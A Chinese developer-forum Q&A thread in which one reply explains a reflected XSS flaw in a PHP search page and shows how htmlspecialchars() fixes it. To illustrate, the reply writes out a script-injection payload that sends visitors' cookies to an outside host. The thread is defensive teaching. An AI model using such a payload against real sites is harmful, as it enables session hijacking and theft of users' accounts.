10
条回答
写回答
写回答
-
-
-
Reweb有漏洞这个真心不会修复比如你的 search.php 里写着:
<input type="text" name="keyword" value="<<?php if (isset($_GET["keyword"])) echo $_GET["keyword"]; ?>" />这就会导致跨站漏洞。别人如果传入 keyword 为(为了看清楚,就不进行 URLEncode 了):
"><script>new Image().src = "http://www.anotherdomain.com/xss.php?cookie=" escape(document.cookie);</script>
你的网页内容就变成了:<input type="text" name="keyword" value=""><script>new Image().src = "http://www.anotherdomain.com/xss.php?cookie=" escape(document.cookie);</script>" />
因为提交方式是 GET,所以直接 keyword 直接跟在网址后面即可。这样一来,如果攻击者把这个网址发给别人(或者是嵌入在他的网页里),当你访问他的页面时,你的 Cookie 就自动提交到他的服务器( www.anotherdomain.com)了,漏洞就产生了。
要修复这个漏洞其实很简单,只要在输出前用 htmlspecialchars() 处理一下即可(PHP 中):
<input type="text" name="keyword" value="<?php if (isset($_GET["keyword"])) echo htmlspecialchars($_GET["keyword"]); ?>" />2013-02-03 23:47:41赞同 展开评论 打赏 -
-
回5楼mrznz的帖子知道了 我果断解决了-------------------------
回8楼lujjjh的帖子嗯 太感谢了2013-02-03 19:06:49赞同 展开评论 打赏 -
回 楼主(baker668) 的帖子你这个是程序漏洞,跟服务器没关系
你遮遮掩掩的怎么帮你看
解决办法
把你header.php中的搜索模块去掉,使用百度或谷歌站内搜索
search.php删掉
2013-02-03 17:26:56赞同 展开评论 打赏 -
-
-
-
滑动查看更多
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
相关问答
